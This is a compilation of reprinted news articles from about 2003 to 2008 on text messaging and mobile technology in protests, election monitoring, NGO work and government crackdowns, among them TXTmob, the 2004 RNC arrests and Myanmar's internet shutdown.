tour laminate, some pain killers, some sharpies, some electrical tape,
some business cards (Mr Rik Hart). Within the case there is also a big
pair of Sony headphones (model MDR7506) with a long curly cable and
three very long XLR to XLR mic cables. Here’s a more specific list of
the microphones :
2 x SM91
5 x SM98
2 x B98
2 x SM81
2 x KSM32
1 x KSM27
2 x B52
3 x SM57
8 x SM58
1 x BSS AR-133 DI Box
(all manufactured by shure)


RE: posted by [ rsolomon ]

nothing sadder than an empty van


NY City Subpoenas Creator of Text Messaging Code
BY Colin Moynihan  /  March 30, 2008

When delegates to the Republican National Convention assembled in New
York in August 2004, the streets and sidewalks near Union Square and
Madison Square Garden filled with demonstrators. Police officers in
helmets formed barriers by stretching orange netting across
intersections. Hordes of bicyclists participated in rolling protests
through nighttime streets, and helicopters hovered overhead.

These tableaus and others were described as they happened in text
messages that spread from mobile phone to mobile phone in New York
City and beyond. The people sending and receiving the messages were
using technology, developed by an anonymous group of artists and
activists called the Institute for Applied Autonomy, that allowed
users to form networks and transmit messages to hundreds or thousands
of telephones.

Although the service, called TXTmob, was widely used by demonstrators,
reporters and possibly even police officers, little was known about
its inventors. Last month, however, the New York City Law Department
issued a subpoena to Tad Hirsch, a doctoral candidate at the
Massachusetts Institute of Technology who wrote the code that created

Lawyers representing the city in lawsuits filed by hundreds of people
arrested during the convention asked Mr. Hirsch to hand over
voluminous records revealing the content of messages exchanged on his
service and identifying people who sent and received messages. Mr.
Hirsch says that some of the subpoenaed material no longer exists and
that he believes he has the right to keep other information secret.
“There’s a principle at stake here,” he said recently by telephone. “I
think I have a moral responsibility to the people who use my service
to protect their privacy.”

The subpoena, which was issued Feb. 4, instructed Mr. Hirsch, who is
completing his dissertation at M.I.T., to produce a wide range of
material, including all text messages sent via TXTmob during the
convention, the date and time of the messages, information about
people who sent and received messages, and lists of people who used
the service.

In a letter to the Law Department, David B. Rankin, a lawyer for Mr.
Hirsch, called the subpoena “vague” and “overbroad,” and wrote that
seeking information about TXTmob users who have nothing to do with
lawsuits against the city would violate their First Amendment and
privacy rights.

Lawyers for the city declined to comment. The subpoena is connected to
a group of 62 lawsuits against the city that stem from arrests during
the convention and have been consolidated in Federal District Court in
Manhattan. About 1,800 people were arrested and charged, but 90
percent of them ultimately walked away from court without pleading
guilty or being convicted. Many people complained that they were
arrested unjustly, and a State Supreme Court justice chastised the
city after hundreds of people were held by the police for more than 24
hours without a hearing.

The police commissioner, Raymond W. Kelly, has called the convention a
success for his department, which he credited with preventing major
disruptions during a turbulent week. He has countered complaints about
police tactics by saying that nearly a million people peacefully
expressed their political opinions, while the convention and the city
functioned smoothly. Mr. Hirsch said that the idea for TXTmob evolved
from conversations about how police departments were adopting
strategies to counter large-scale marches that converged at a single

While preparing for the 2004 political conventions in New York and
Boston, some demonstrators decided to plan decentralized protests in
which small, mobile groups held rallies and roamed the streets. “The
idea was to create a very dynamic, fluid environment,” Mr. Hirsch
said. “We wanted to transform areas around the entire city into
theaters of dissent.”

Organizers wanted to enable people in different areas to spread word
of what they were seeing in each spot and to coordinate their
movements. Mr. Hirsch said that he wrote the TXTmob code over about
two weeks. After a trial run in Boston during the Democratic National
Convention, the service was in wide use during the Republican
convention in New York. Hundreds of people went to the TXTmob Web site
and joined user groups at no charge.

As a result, when members of the War Resisters League were arrested
after starting to march up Broadway, or when Republican delegates
attended a performance of “The Lion King” on West 42nd Street, a
server under a desk in Cambridge, Mass., transmitted messages
detailing the action, often while scenes on the streets were still

Messages were exchanged by self-organized first-aid volunteers,
demonstrators urging each other on and even by people in far-flung
cities who simply wanted to trade thoughts or opinions with those on
the streets of New York. Reporters began monitoring the messages too,
looking for word of breaking news and rushing to spots where mass
arrests were said to be taking place. And Mr. Hirsch said he thought
it likely that police officers were among those receiving TXTmob
messages on their phones.

It is difficult to know for sure who received messages, but an
examination of police surveillance documents prepared in 2003 and
2004, and unsealed by a federal magistrate last year, makes it clear
that the authorities were aware of TXTmob at least a month before the
Republican convention began.

A document marked “N.Y.P.D. SECRET” and dated July 26, 2004, included
the address of the TXTmob Web site and stated, “It is anticipated that
text messaging is one of several different communications systems that
will be utilized to organize the upcoming RNC protests.”


Tad Hirsch
email : tad [at] media [dot] mit [dot] edu

John Henry
Institute for Applied Autonomy
email : iaa [at] appliedautonomy [dot] com


TXTmob: Text Messaging For Protest Swarms
BY Tad Hirsch and John Henry

Abstract: “This paper describes cell phone text messaging during the
2004 US Democratic and Republican National Conventions by protesters
using TXTmob – a text-message broadcast system developed by the
authors.  Drawing upon analysis of TXTmob messages, user interviews,
self-reporting, and news media accounts, we describe the ways that
activists used text messaging to share information and coordinate
actions during decentralized protests. We argue that text messaging
supports new forms of distributed participation in mass mobilizations.




Competition to Offer Prizes and SMS Platform to Grassroots NGOs  /
Sep. 17, 2007
nGOmobile initiative highlights the benefits of mobile technology in
the developing world

CAMBRIDGE, England, Sept. 17 /PRNewswire/ — Mobile technology
organization has launched its latest non-profit mobile
initiative – nGOmobile, a competition to help grassroots NGOs take
advantage of text messaging.

The explosive entry of mobile technology into the developing world has
opened up a raft of opportunities for the non-profit sector. Text
messaging has proved itself to be remarkably versatile, helping remind
patients to take their medicine, providing market prices to farmers
and fishermen, distributing health information, allowing the reporting
of human rights abuses and promoting increased citizen participation
in government. While the list may be long, not everyone has been able
to reap the benefits.

nGOmobile is a competition aimed exclusively at grassroots non-profit
Non Governmental Organizations (NGOs) working for positive social and
environmental change throughout the developing world. “Behind the
scenes, the often unsung heroes of the NGO community battle against
the daily realities of life in developing countries, where it can take
all day to fulfill the simplest task,” said Ken Banks, Founder of “These people don’t lack passion and commitment, they
lack tools and resources” said Banks.”

Grassroots NGOs around the world are invited to submit short project
ideas explaining how greater access to mobile technology – and SMS
text messaging in particular – would benefit them and their work. The
competition is open from today until 14th December 2007 with the
winners announced in January 2008.

The top four entries, chosen by a distinguished panel of judges, will
each win a brand new Hewlett Packard laptop computer, two Nokia mobile
phones, a GSM modem,’s own entry-level text messaging
platform – FrontlineSMS – and to top it all, a cash prize of US$1,000.

Sponsors of the competition include Hewlett Packard, Nokia,
ActiveXperts, 160 Characters, Wieden+Kennedy, mBlox and Perkins Coie

Panel of Judges Ken Banks, Founder, Neerja Raman, From
Good to Gold Mike Grenville, Editor, 160 Characters Micheline Ntiru,
Nokia’s Head of Corporate Social Investment for the Middle East and
Africa Bill Thompson, Journalist/commentator Renny Gleeson, Global
Director of Digital Strategies at Wieden+Kennedy The competition
website can be found at

Ken Banks, Founder
email : ken [dot] banks [at] ngomobile [dot] org

About Since 2003, has been helping local,
national and international non-profit Non-Governmental Organizations
(NGOs) make better use of information and communications technology in
their work. Specializing in the application of mobile technology, it
provides a wide range of ICT-related services drawing on over 22
year’s experience of its Founder, Ken Banks. believes that
all non-profits, whatever their size and wherever they operate, should
be given the opportunity to implement the latest mobile technologies
in their work, and actively seeks to provide the tools to enable them
to do so.





BY Jeffrey Kosseff   /  March 25, 2003

At first glance, it looks like a 9-1-1 log or a transcript from the
police scanner:

05:37pm Protesters damage cars on Second and Davis.
05:38pm March spreading north into Oldtown.
05:43pm Morrison Bridge closed again.

But the communications Thursday during antiwar protests in downtown
Portland weren’t from the police. Instead, they were part of 126 text
messages sent out to 65 protesters’ cell phones, pagers and e-mail

Protesters say they have long searched for an efficient and quick way
of sharing news of bridge shutdowns, flag burnings and pepper
spraying. And they seem to have found it in a relatively young
wireless technology that is reliable, cheap and instantaneous, sending
short bursts of text onto many cell-phone screens at once.

“It definitely helped spread the news around,” said Michael Plump, a
24-year-old computer programmer who organized a text-messaging system
to improve communication among protesters.

Spreading news of developments takes too long with cell-phone calls
because organizers can reach only one person at a time. Walkie-talkies
aren’t reliable or secure enough. And most people don’t have laptops
with wireless e-mail access.

Plump said that since police pepper-sprayed him at a protest during
President Bush’s Aug. 23 visit to Portland, he has wanted to get more
involved with peace protests. “I wanted to help people know where the
police actions were occurring and where they were pepper spraying so
they could get away from it,” Plump said.

Web of reports

So he developed a Web-based program that allows protesters to enter
their cell phone or pager numbers or e-mail addresses into an online
database, which he promoted on Portland activist Web sites. Most
people received the alerts on cell phones or pagers, though a few
received e-mails.

From 4 p.m. to midnight Thursday, about 15 protesters throughout
downtown Portland phoned or sent e-mail and text messages to Plump’s
friend, Casey Spain. Spain summarized developments into a few words
and sent them on to the 65 cell-phone numbers in the database. Plump,
who was in downtown Portland throughout the protests, said cheers
erupted whenever Spain sent news of activists storming a bridge or

And even amid the chaos, the protesters found time for text-messaging

08:27pm Rummor — police may be planning assult from under Burnside
08:28pm Someone plase scout under the bridge please!
08:31pm Police may be eating donuts under the bridge.

Cell-phone text messaging is gaining popularity. According to
Telephia, a California research firm, 24 percent of U.S. cell-phone
subscribers used text messaging in the first quarter of this year, up
from 20 percent the previous quarter.

Verizon service up

Verizon Wireless, which charges 10 cents to send and 2 cents to
receive each text message, has seen its news-alert service double
since January for headlines about the military and Federal Bureau of
Investigation. “A lot of people use text messaging now, and it has
been going up all the time,” said Georgia Taylor, a Verizon Wireless

Wireless companies began offering text messaging in the United States
about two years ago, said Goli Ameri, president of eTinium, a Portland
telecommunications consulting firm. It is not yet as popular in the
United States as it is in Asia and Europe. Intel recently ranked
Portland the top city in the nation for the use of wireless
technology, so Ameri said she isn’t surprised that people here are
finding new uses for text messaging.

“Portland is a pretty tech-savvy city,” she said. “That’s why you see
so many of these new technologies get introduced here first.”

{email : jeffkosseff [at] news [dot] oregonian [dot] com}


Videos Challenge Accounts of Convention Unrest
BY Jim Dwyer  /  April 12, 2005  /  New York Times

Dennis Kyne put up such a fight at a political protest last summer,
the arresting officer recalled, it took four police officers to haul
him down the steps of the New York Public Library and across Fifth

“We picked him up and we carried him while he squirmed and screamed,”
the officer, Matthew Wohl, testified in December. “I had one of his
legs because he was kicking and refusing to walk on his own.”

Accused of inciting a riot and resisting arrest, Mr. Kyne was the
first of the 1,806 people arrested in New York last summer during the
Republican National Convention to take his case to a jury. But one day
after Officer Wohl testified, and before the defense called a single
witness, the prosecutor abruptly dropped all charges.

During a recess, the defense had brought new information to the
prosecutor. A videotape shot by a documentary filmmaker showed Mr.
Kyne agitated but plainly walking under his own power down the library
steps, contradicting the vivid account of Officer Wohl, who was
nowhere to be seen in the pictures. Nor was the officer seen taking
part in the arrests of four other people at the library against whom
he signed complaints.

A sprawling body of visual evidence, made possible by inexpensive,
lightweight cameras in the hands of private citizens, volunteer
observers and the police themselves, has shifted the debate over
precisely what happened on the streets during the week of the

For Mr. Kyne and 400 others arrested that week, video recordings
provided evidence that they had not committed a crime or that the
charges against them could not be proved, according to defense lawyers
and prosecutors.

Among them was Alexander Dunlop, who said he was arrested while going
to pick up sushi.

Last week, he discovered that there were two versions of the same
police tape: the one that was to be used as evidence in his trial had
been edited at two spots, removing images that showed Mr. Dunlop
behaving peacefully. When a volunteer film archivist found a more
complete version of the tape and gave it to Mr. Dunlop’s lawyer,
prosecutors immediately dropped the charges and said that a technician
had cut the material by mistake.

Seven months after the convention at Madison Square Garden, criminal
charges have fallen against all but a handful of people arrested that
week. Of the 1,670 cases that have run their full course, 91 percent
ended with the charges dismissed or with a verdict of not guilty after
trial. Many were dropped without any finding of wrongdoing, but also
without any serious inquiry into the circumstances of the arrests,
with the Manhattan district attorney’s office agreeing that the cases
should be “adjourned in contemplation of dismissal.”

So far, 162 defendants have either pleaded guilty or were convicted
after trial, and videotapes that bolstered the prosecution’s case
played a role in at least some of those cases, although prosecutors
could not provide details.

Besides offering little support or actually undercutting the
prosecution of most of the people arrested, the videotapes also
highlight another substantial piece of the historical record: the
Police Department’s tactics in controlling the demonstrations, parades
and rallies of hundreds of thousands of people were largely free of
explicit violence.

Throughout the convention week and afterward, Mayor Michael R.
Bloomberg said that the police issued clear warnings about blocking
streets or sidewalks, and that officers moved to arrest only those who
defied them. In the view of many activists – and of many people who
maintain that they were passers-by and were swept into dragnets
indiscriminately thrown over large groups – the police strategy
appeared to be designed to sweep them off the streets on technical
grounds as a show of force.

“The police develop a narrative, the defendant has a different story,
and the question becomes, how do you resolve it?” said Eileen Clancy,
a member of I-Witness Video, a project that assembled hundreds of
videotapes shot during the convention by volunteers for use by defense

Paul J. Browne, a police spokesman, said that videotapes often do not
show the full sequence of events, and that the public should not rush
to criticize officers simply because their recollections of events are
not consistent with a single videotape. The Manhattan district
attorney’s office is reviewing the testimony of Officer Wohl at the
request of Lewis B. Oliver Jr., the lawyer who represented Mr. Kyne in
his arrest at the library.

The Police Department maintains that much of the videotape that has
surfaced since the convention captured what Mr. Browne called the
department’s professional handling of the protests and parades. “My
guess is that people who saw the police restraint admired it,” he

Video is a useful source of evidence, but not an easy one to manage,
because of the difficulties in finding a fleeting image in hundreds of
hours of tape. Moreover, many of the tapes lack index and time
markings, so cuts in the tape are not immediately apparent.

That was a problem in the case of Mr. Dunlop, who learned that his
tape had been altered only after Ms. Clancy found another version of
the same tape. Mr. Dunlop had been accused of pushing his bicycle into
a line of police officers on the Lower East Side and of resisting
arrest, but the deleted parts of the tape show him calmly approaching
the police line, and later submitting to arrest without apparent

A spokeswoman for the district attorney, Barbara Thompson, said the
material had been cut by a technician in the prosecutor’s office. “It
was our mistake,” she said. “The assistant district attorney wanted to
include that portion” because she initially believed that it supported
the charges against Mr. Dunlop. Later, however, the arresting officer,
who does not appear on the video, was no longer sure of the specifics
in the complaint against Mr. Dunlop.

In what appeared to be the most violent incident at the convention
protests, video shot by news reporters captured the beating of a man
on a motorcycle – a police officer in plainclothes – and led to the
arrest of one of those involved, Jamal Holiday. After eight months in
jail, he pleaded guilty last month to attempted assault, a low-level
felony that will be further reduced if he completes probation. His
lawyer, Elsie Chandler of the Neighborhood Defender Service of Harlem,
said that videos had led to his arrest, but also provided support for
his claim that he did not realize the man on the motorcycle was a
police officer, reducing the severity of the offense.

Mr. Browne, the police spokesman, said that despite many civilians
with cameras who were nearby when the officer was attacked, none of
the material was turned over to police trying to identify the
assailants. Footage from a freelance journalist led police to Mr.
Holiday, he said.

In the bulk of the 400 cases that were dismissed based on videotapes,
most involved arrests at three places – 16th Street near Union Square,
17th Street near Union Square and on Fulton Street – where police
officers and civilians taped the gatherings, said Martin R. Stolar,
the president of the New York City chapter of the National Lawyers
Guild. Those tapes showed that the demonstrators had followed the
instructions of senior officers to walk down those streets, only to
have another official order their arrests.

Ms. Thompson of the district attorney’s office said, “We looked at
videos from a variety of sources, and in a number of cases, we have
moved to dismiss.”


Texting It In: Monitoring Elections With Mobile Phones
BY KatrinVerclas  /  August 11, 2007

In Sierra Leone’s national election today, 500 election observers at
polling stations around the country are reporting on any
irregularities via SMS with their mobile phones. Independent
monitoring of elections via cell phone is growing aqround the world,
spearheaded by a few innovative NGOs.

The story starts in Montenegro, a small country in the former
Yugoslavia. On May 21, 2006 the country saw the first instance of
volunteer monitors using SMS, also known as text messaging, as their
main election reporting tool. A Montenegrin NGO, the Center for
Democratic Transition (CDT), with technical assistance from the
National Democratic Institute (NDI) in the United States, was the
first organization in the world to use text messaging to meet all
election day reporting requirements.

Since then, mobile phones have been deployed in six elections in
countries around the world, with volunteers systematically using text
messaging in election monitoring. Pioneered by NDI, SMS monitoring is
becoming a highly sophisticated rapid reporting tool used not just in
a referendum election like in Montenegro, but in parliamentary
elections with a plethora of candidates and parties and complex data
reported via SMS. This was the case in Bahrain, a small country in the
Middle East, where monitors reported individual election tallies in a
series of five to fourty concurrent SMS messages, using a
sophisticated cosding system, with near accuracy.

Today’s election in Sierra Leone is lead by the National Election
Watch (NEW), a coalition of over 200 NGOs in the country. Assisted by
NDI, NEW has monitors at 500 of the 6171 polling stations. Monitors
report on whether there are any irregularities via SMS back to
headquarters. This election is particularly significant for the
country: It is the first presidential election since U.N. peacekeepers
withdrew two years ago. It considered a historic poll that many hope
will show that the country can transfer power peacefully after a long
civil war and military coups. In the run-up to the election there was
sporadic violence in Freetown; making the independent monitoring by
NGOs particularly relevant and necessary.

Election monitoring is a highly technical discipline, with a
sophisticated set of methodologies and extensive volunteer training.
Preparation for an election monitoring exercise involves volunteer
training and advance planning that often starts months before an
election.  Election monitors, typically led by domestic non-
governmental organizations (NGOs) often with the help of foreign
technical assistance providers like NDI, can report on multiple
dimensions.  They may, depending on the election, report on
quantitative data such as real-time voter turnout and even on actual
election results. In those cases, monitors use the data to provide a
“quick count” projection of the election results.  If a “quick count”
is conducted then a statistical random sample of polling places is
carefully selected to ensure the validity of projections.

Monitors also report on qualitative data about how well the election
is executed. This may include information on whether polls are opening
on time, whether there are enough ballots available, whether there is
free access to polling places, and whether there is any evidence of
intimidation or any other irregularities.

Reports are transmitted using an agreed-upon set of codes from a
representative sample of polling places around the country. In Sierra
Leone, for example, there are monitors stationed at 500 polling places
in every part of the country who text in reports at regular intervals.

In many contested elections, especially in emerging democracies, speed
of reporting is of the essence. It is critical that NGOs and
independent civil society organizations report data accurately and
quickly even before official results are released, especially when
fraud is feared. Mobile phones have been an important tool in this
regard. They are, of course, not a new phenomenon in election
monitoring; after all, cell phones have been around for a while now.
But prior to NDI showcasing that SMS is a viable and reliable
communication medium in elections, mobile phones were used merely to
transmit reports verbally that then still had to be transcribed in a
time-consuming and error-prone manual process.

Chris Spence, Director of Technology at NDI recalls: “In 2003, we had
24/7 shifts of college students in five locations across Nigeria
entering data from paper forms that were faxed or hand-carried into
the data centers. Timeliness and quality control were huge issues when
nearly 15,000 forms containing dozens of responses each had to be
manually entered into a database. Today, in the elections where we’ve
used SMS, you watch the data flow into the database directly when it
is time for the monitors to report. The system automatically sends
confirmation messages back to the observer in an interactive exchange
of SMS messages, so accuracy increases. At reporting time, it is quite
amazing to see the numbers change on the screen as the sms messages
pour into the database.”

In addition to increased speed and greater accuracy of reporting, SMS
election monitoring has a noteworthy ancillary benefit: the real-time
ability by headquarters to communicate with observers throughout the
election day by sending text reminders and updates keeps volunteers
motivated and engaged. SMS and phone contact also provides vital
opportunities for security updates should political conditions take a
turn for the worst.  As a result, morale amongst the volunteers soars
there is far less polling station abandonment.

In order for large-scale SMS election monitoring to succeed, a number
of conditions have to be in place. When NDI assisted an Albanian
consortium of NGOs in the local elections there in 2006, all the right
elements were present: NDI was working with an experienced and
reliable local NGO partner; SMS bulk messaging was available for all
of the mobile phone companies; the phone companies worked with the
NGOs and were available and ready during election day to deal with any
problems on the spot; phone companies and the bulk SMS vendors were
able to handle thousands of messages per minute to a few numbers at
reporting times, wireless coverage even in rural areas was excellent,
and the phone companies provided so-called interconnect ability that
allowed monitors to send messages from all of the different carriers
to one reporting number.

In Sierra Leone where most of the carriers lack international gateway
interconnect ability, the NGO coalition there will need to set up a
series of local phone numbers so that observers can text to a number
within their own provider network.  This necessitates a much more
rudimentary and complicated setup: Seven phones are tethered to a
laptop and observers are texting directly to those phones without any
bulk messaging intermediary.  Messages arrive in the phone and are
passed to computer, the software reads it using custom scripts, and
the data is compiled in an Access database ready for analysis.
Concerns about the phones handling a high volume of messages in this
situation necessitates a more complicated reporting strategy whereby
each observer will report all of data in a single text message using a
simple coding scheme.  Because Sierra Leone has more spotty wireless
coverage, election monitors in rural areas will have to travel to
areas where there is coverage to send in their reports at the end of
the day.

An important consideration is the cost of a wide-scale program. To
date NDI has found this method of reporting much more economical than
other strategies.  Pricing for bulk sms from a provider like Clickatel
is relatively inexpensive. In the Albanian election, for example, the
bulk messaging costs for a total of some 41,000 messages received and
sent from 2100 monitors was $2400 US Dollars — an extremely
inexpensive way to receive such massive amounts of data.

NDI uses a software called SMS Reception Center, built by a developer
in Russia and costing all of $69 USD. NDI tweaked the scripts over
time, and paid the developer to improve the product for its purposes
and specific local conditions.

In addition to the technical issues and costs inherent in running a
large-scale operation, Spence notes a number of strategic issues to
consider: The NGO partner on the ground needs to be experienced in
electoral monitoring, the information collected needs to be suitable
for the limited text messaging format of 160 chracters, and text
messaging needs to be commonly used and part of the local culture.
Notes Spence: “In all the countries we have worked, one thing we do
not have to do is train anyone how to text.”

In Nigeria earlier this year, a local NGO, the Human Emancipation
Project, ran a small-scale citizen monitoring program that used
untrained citizen reporters to send in SMS messages to one number. The
NGO compiled and aggregated the incoming messages and issued a report
after the election. Using a grassroots software tool, Frontline SMS,
organizers reported that about 8,000 individuals texted in some kind
of report. This is a very different method from the systematic
election monitoring conducted by NGO observer organizations and their
technical assistant providers where a more rigorous protocol is
adhered to. There is merit in engaging every-day citizens to protect
their country’s elections even if these efforts do not produce
reliable and verifiable election results and reports in the manner
that systematic election monitoring does. The Nigerian effort was
widely covered BBC News, and other outlets.

In the two years since the first large-scale SMS monitoring in
Montenegro, there have been rapid improvements in mobile services as
competition in the wireless industry has increased worldwide, and
there is growing interest and understanding on the part of NGOs that
systematic election monitoring is not as difficult as it first may
seem. As election monitoring via SMS becomes standardized and NGOs
gain experience, there is no reason for mobile phones and SMS not to
play a greater role in other areas of civic participation. For
example, imagine citizen oversight of public works projects where
people might report on whether a clinic is actually built as indicated
in a local budget. Other applications may be monitoring and
accountability of elected officials, and dissemination of voter
registration information such as the address of where to register, or
the nearest polling station. Several pilot projects in the United
States showed promising results in increasing voter turnout by text
message reminders. The future is bright for innovative ways in which
cell phones are used by citizens to participate and engage in their
countries as the mobile revolution unfolds.


Moving beyond Nigeria’s mobile rough patch
BY Judy Breck  /  August 27th, 2007

Reuters is reporting this morning that “Nigeria Aims to Let Mobile
Phone Users Keep Numbers.” The plan is to allow subscribers to keep
their numbers as they switch among providers — hopefully to improve
service through competition. The report includes this description of
the roughness of present service in Nigeria, which is interesting to
realize. Mobile has been making a positive transition in Africa in
spite of the problems described below. When mobile service gets
better, the transition should have important new impetus one would

Nigeria’s booming mobile phone market has grown from scratch to over
30 million subscribers in six years, making it one of the fastest-
growing in the world.

It is seen as having potential for many more years of rapid growth as
Nigeria is Africa’s most populous country with 140 million people, the
majority of whom do not have phones.

However, the quality of service from mobile phone providers has always
been patchy and it has deteriorated over time.

Subscribers often have to dial several times before a call goes
through. Sometimes no calls go through for hours. When they do
connect, the lines are often so bad that callers cannot hear each
other. Calls frequently cut off after a few seconds and text messages
can be delayed by hours.

Mobile operators argue that services are impaired by frequent
blackouts, forcing companies to provide their own power with costly
diesel generators, and constant vandalism and armed attacks on
facilities and staff.


Monks Are Silenced, and for Now, Internet Is, Too
BY Seth Mydans  /  October 4, 2007

BANGKOK, Oct. 3 — It was about as simple and uncomplicated as shooting
demonstrators in the streets. Embarrassed by smuggled video and
photographs that showed their people rising up against them, the
generals who run Myanmar simply switched off the Internet. Until
Friday television screens and newspapers abroad were flooded with
scenes of tens of thousands of red-robed monks in the streets and of
chaos and violence as the junta stamped out the biggest popular
uprising there in two decades.

But then the images, text messages and postings stopped, shut down by
generals who belatedly grasped the power of the Internet to jeopardize
their crackdown. “Finally they realized that this was their biggest
enemy, and they took it down,” said Aung Zaw, editor of an exile
magazine based in Thailand called The Irrawaddy, whose Web site has
been a leading source of information in recent weeks. The site has
been attacked by a virus whose timing raises the possibility that the
military government has a few skilled hackers in its ranks.

The efficiency of this latest, technological, crackdown raises the
question whether the vaunted role of the Internet in undermining
repression can stand up to a determined and ruthless government — or
whether Myanmar, already isolated from the world, can ride out a
prolonged shutdown more easily than most countries.

OpenNet Initiative, which tracks Internet censorship, has documented
signs that in recent years several governments — including those of
Belarus, Kyrgyzstan and Tajikistan — have closed off Internet access,
or at least opposition Web sites, during periods preceding elections
or times of intense protests. The brief disruptions are known as “just
in time” filtering, said Ronald J. Deibert of OpenNet. They are
designed to quiet opponents while maintaining an appearance of
technical difficulties, thus avoiding criticism from abroad. In 2005,
King Gyanendra of Nepal ousted the government and imposed a weeklong
communications blackout. Facing massive protests, he ceded control in

Myanmar has just two Internet service providers, and shutting them
down was not complicated, said David Mathieson, an expert on Myanmar
with Human Rights Watch. Along with the Internet, the junta cut off
most telephone access to the outside world. Soldiers on the streets
confiscated cameras and video-recording cellphones. “The crackdown on
the media and on information flow is parallel to the physical
crackdown,” he said. “It seems they’ve done it quite effectively.
Since Friday we’ve seen no new images come out.” In keeping with the
country’s self-imposed isolation over the past half-century, Myanmar’s
military seemed prepared to cut the country off from the virtual world
just as it had from the world at large. Web access has not been
restored, and there is no way to know if or when it might be.

At the same time, the junta turned to the oldest tactic of all to
silence opposition: fear. Local journalists and people caught
transmitting information or using cameras are being threatened and
arrested, according to Burmese exile groups. In a final, hurried
telephone call, Mr. Aung Zaw said, one of his longtime sources said
goodbye. “We have done enough,” he said the source told him. “We can
no longer move around. It is over to you — we cannot do anything
anymore. We are down. We are hunted by soldiers — we are down.”

There are still images to come, Mr. Aung Zaw said, and as soon as he
receives them and his Web site is back up, the world will see them.
But Mr. Mathieson said the country’s dissidents were reverting to
tactics of the past, smuggling images out through cellphones, breaking
the files down for reassembly later. It is not clear how much longer
the generals can hold back the future. Technology is making it harder
for dictators and juntas to draw a curtain of secrecy. “There are
always ways people find of getting information out, and authorities
always have to struggle with them,” said Mitchell Stephens, a
professor of journalism at New York University and the author of “A
History of News.”

“There are fewer and fewer events that we don’t have film images of:
the world is filled with Zapruders,” he said, referring to Abraham
Zapruder, the onlooker who recorded the assassination of President
John F. Kennedy in 1963. Before Friday’s blackout, Myanmar’s hit-and-
run journalists were staging a virtuoso demonstration of the power of
the Internet to outmaneuver a repressive government. A guerrilla army
of citizen reporters was smuggling out pictures even as events were
unfolding, and the world was watching.

“For those of us who study the history of communication technology,
this is of equal importance to the telegraph, which was the first
medium that separated communications and transportation,” said Frank
A. Moretti, executive director of the Center for New Media Teaching
and Learning at Columbia University. Since the protests began in mid-
August, people have sent images and words through SMS text messages
and e-mail and on daily blogs, according to some exile groups that
received the messages. They have posted notices on Facebook, the
social networking Web site. They have sent tiny messages on e-cards.
They have updated the online encyclopedia Wikipedia.

They also used Internet versions of “pigeons” — the couriers that
reporters used in the past to carry out film and reports — handing
their material to embassies or nongovernment organizations with
satellite connections. Within hours, the images and reports were
broadcast back into Myanmar by foreign radio and television stations,
informing and connecting a public that hears only propaganda from its

These technological tricks may offer a model to people elsewhere who
are trying to outwit repressive governments. But the generals’ heavy-
handed response is probably a less useful model. Nations with larger
economies and more ties to the outside world have more at stake.
China, for one, could not consider cutting itself off as Myanmar has
done, and so control of the Internet is an industry in itself. “In
China, it’s massive,” said Xiao Qiang, director of the China Internet
Project and an adjunct professor at the graduate school of journalism
at the University of California, Berkeley.

“There’s surveillance and intimidation, there’s legal regulation and
there is commercial leverage to force private Internet companies to
self-censor,” he said. “And there is what we call the Great Firewall,
which blocks hundreds of thousands of Web sites outside of China.” Yet
for all its efforts, even China cannot entirely control the Internet,
an easier task in a smaller country like Myanmar.

As technology makes everyone a potential reporter, the challenge in
risky places like Myanmar will be accuracy, said Vincent Brossel, head
of the Asian section of the press freedom organization Reporters
Without Borders. “Rumors are the worst enemy of independent
journalism,” he said. “Already we are hearing so many strange things.
So if you have no flow of information and the spread of rumors in a
country that is using propaganda — that’s it. You are destroying the
story, and day by day it goes down.” The technological advances on the
streets of Myanmar are the latest in a long history of revolutions in
the transmission of news — from the sailing ship to the telegraph to
international telephone lines and the telex machine to computers and
satellite telephones.

“Today every citizen is a war correspondent,” said Phillip Knightley,
author of “The First Casualty,” a classic history of war reporting
that starts with letters home from soldiers in Crimea in the 1850s and
ends with the “living room war” in Vietnam in the 1970s, the first war
that people could watch on television. “Mobile phones with video of
broadcast quality have made it possible for anyone to report a war,”
he said in an e-mail interview. “You just have to be there. No trouble
getting a start: the broadcasters have been begging viewers to send
their stuff.”


Shanghai’s Middle Class Launches Quiet, Meticulous Revolt
BY Maureen Fan  /  January 26, 2008

SHANGHAI — Bundled against the cold, the businessman made his way
down the steps. Coming toward him in blue mittens was a middle-aged
woman. “Do you know that we’re going to take a stroll this weekend?”
she whispered, using the latest euphemism for the unofficial protests
that have unnerved authorities in Shanghai over the past month. He

Behind her, protest banners streamed from the windows of high-rise
apartment blocks, signs of middle-class discontent over a planned
extension of the city’s magnetic levitation, or maglev, train through
residential neighborhoods. The couple checked to make sure no
plainclothes police were nearby and discussed where security forces
had been posted in recent days. “Did you take any photos?” the man
asked. Yes, she said, promising to send them to him so he could post
the evidence online. In a minute, the exchange was over, but the news
would soon be added to the steady flow of reports being posted on
blogs and community bulletin boards, as well as in housing compounds
along the proposed extension — which residents contend will bring
noise pollution and possibly dangerous radiation to their

The sudden “strolls” by thousands of office workers, company managers,
young families and the elderly in this sleek financial hub are the
latest chapter in a quiet middle-class battle against government
officials. The protesters are going about their mission carefully, and
many speak anonymously for fear of retribution in a country that
stifles dissent. The Communist Party has a massive security apparatus
that closely monitors what it views as subversive activity. The party
sometimes allows public protests if they serve its political
interests, such as the ouster of corrupt officials.

But the protests here have been unusual. They are led by homeowners
and professionals — people who may not previously have had much to
complain to the government about but whose awareness of their
individual rights has grown along with their prosperity. Police, who
have routinely put down rural protests by poor farmers, have found it
more difficult to intimidate an affluent, educated crowd in a major

The demonstrations do have at least one recent precursor, and it is
one Shanghai residents acknowledge using for inspiration. In the
picturesque seaside city of Xiamen, thousands of middle-class
residents have managed at least temporarily to halt the construction
of a $1 billion chemical factory because of environmental concerns.
Demonstrators in that city, in Fujian province, relied on the Internet
and cellphone text messaging to organize strolls and other opposition.
“We learned from Xiamen,” said Gu Qidong, 36, a Shanghai protester and
freelance sales consultant in the health-care industry. “We have no
other way besides this. We once asked if we could apply for a march
permit, and the police said they would never approve it.”

As in Xiamen, Shanghai residents have spent countless hours
researching their cause. They have posted fliers sprinkled with such
phrases as “electromagnetic compatibility” and wooed residents and
news media with slick PowerPoint presentations that question whether a
55-yard-wide safety buffer envisioned for each side of the rail
extension would be sufficient to keep noise and vibration from
reaching their apartments.

They say the existing maglev route, which takes passengers from an out-
of-the-way suburban subway stop to one of the city’s international
airports in less than eight minutes, is a showy waste of money. When
it opened four years ago, they note, the line operated at less than 20
